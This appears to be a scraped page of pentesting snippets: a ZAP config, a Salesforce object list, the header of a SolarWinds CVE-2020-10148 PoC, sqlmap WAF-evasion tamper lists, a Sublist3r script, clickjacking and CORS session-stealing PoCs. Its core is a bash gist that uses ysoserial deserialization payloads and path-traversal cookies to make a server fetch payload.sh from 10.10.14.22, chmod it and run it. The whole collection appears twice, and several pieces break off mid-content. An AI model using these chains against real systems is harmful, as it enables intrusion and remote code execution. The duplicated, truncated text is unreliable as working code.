hexrom

## zap-template.yaml
--- # OWASP ZAP automation configuration file, for more details see https://www.zaproxy.com/docs/(TBA)
env:                                      # The environment, mandatory
  contexts:                               # List of 1 or more contexts, mandatory
    - name: context 1                     # Name to be used to refer to this context in other jobs, mandatory
      url: http://demo.testfire.net             # The top level url, mandatory, everything under this will be included
      includePaths:  # TBA: An optional list of regexes to include
      excludePaths:  # TBA: An optional list of regexes to exclude
      authentication:                     # TBA: In time to cover all auth configs
  parameters:
    failOnError: true                  # If set exit on an error

## Salesforce-Aura-StandardObjects.txt
AcceptedEventRelation
Account
AccountBrand
AccountContactRelation
AccountCleanInfo
AccountContactRole
AccountInsight
AccountOwnerSharingRule
AccountPartner
AccountRelationship

## CVE-2020-10148.py
# CVE-2020-10148  (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
# @0xSha
# (C) 2020 0xSha.io

# Advisory : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details : https://kb.cert.org/vuls/id/843464

# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules

## gist:84c723b8658a3b5b881c67d20325418b
#!/bin/bash
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 'curl http://10.10.14.22/payload.sh -o /tmp/payload.sh' > downloadPayload.session
curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/downloadPayload' -F 'image=@downloadPayload.session'
curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/downloadPayload'
sleep 1
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmodPayload.session
curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/chmodPayload' -F 'image=@chmodPayload.session'
curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/chmodPayload'
sleep 1
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 'bash /tmp/payload.sh' > executePayload.session

## sqlmap tamper scripts
# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
# Microsoft access
```

## deepersubs.sh
#!/bin/bash

# This script automates running Sublist3r against all third-level subdomains.

mkdir thirdlevels

echo "Gathering full third-level domains with Sublist3r..."
for domain in $(cat third-level.txt); do sublist3r -d $domain -o thirdlevels/$domain.txt; cat thirdlevels/$domain.txt |sort -u >> final.txt;

echo "Probing for alive third-levels..."

## clickjack-poc.html
<!DOCTYPE html>
<html>

<frameset cols="25%, 25%">
	 <frame
src="https://<Affected URL>">
</frameset>

</html>

## cors.html
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
	--- # OWASP ZAP automation configuration file, for more details see https://www.zaproxy.com/docs/(TBA)
	env: # The environment, mandatory
	contexts: # List of 1 or more contexts, mandatory
	- name: context 1 # Name to be used to refer to this context in other jobs, mandatory
	url: http://demo.testfire.net # The top level url, mandatory, everything under this will be included
	includePaths: # TBA: An optional list of regexes to include
	excludePaths: # TBA: An optional list of regexes to exclude
	authentication: # TBA: In time to cover all auth configs
	parameters:
	failOnError: true # If set exit on an error
	AcceptedEventRelation
	Account
	AccountBrand
	AccountContactRelation
	AccountCleanInfo
	AccountContactRole
	AccountInsight
	AccountOwnerSharingRule
	AccountPartner
	AccountRelationship
	# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
	# @0xSha
	# (C) 2020 0xSha.io

	# Advisory : https://www.solarwinds.com/securityadvisory
	# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
	# Details : https://kb.cert.org/vuls/id/843464

	# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
	# According to SolarWinds.Orion.Web.HttpModules
	#!/bin/bash
	java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 'curl http://10.10.14.22/payload.sh -o /tmp/payload.sh' > downloadPayload.session
	curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/downloadPayload' -F 'image=@downloadPayload.session'
	curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/downloadPayload'
	sleep 1
	java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmodPayload.session
	curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/chmodPayload' -F 'image=@chmodPayload.session'
	curl http://target.demo:8080/upload.jsp -H 'Cookie:JSESSIONID=../../../opt/samples/uploads/chmodPayload'
	sleep 1
	java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections2 'bash /tmp/payload.sh' > executePayload.session
	# All scripts
	```
	--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
	```
	# General scripts
	```
	--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
	```
	# Microsoft access
	```
	#!/bin/bash

	# This script automates running Sublist3r against all third-level subdomains.

	mkdir thirdlevels

	echo "Gathering full third-level domains with Sublist3r..."
	for domain in $(cat third-level.txt); do sublist3r -d $domain -o thirdlevels/$domain.txt; cat thirdlevels/$domain.txt \|sort -u >> final.txt;

	echo "Probing for alive third-levels..."
	<!DOCTYPE html>
	<html>

	<frameset cols="25%, 25%">
	<frame
	src="https://<Affected URL>">
	</frameset>

	</html>
	<!DOCTYPE html>
	<html>
	<body>
	<center>
	<h2>CORS POC Exploit</h2>
	<h3>Extract SID</h3>

	<div id="demo">
	<button type="button" onclick="cors()">Exploit</button>
	</div>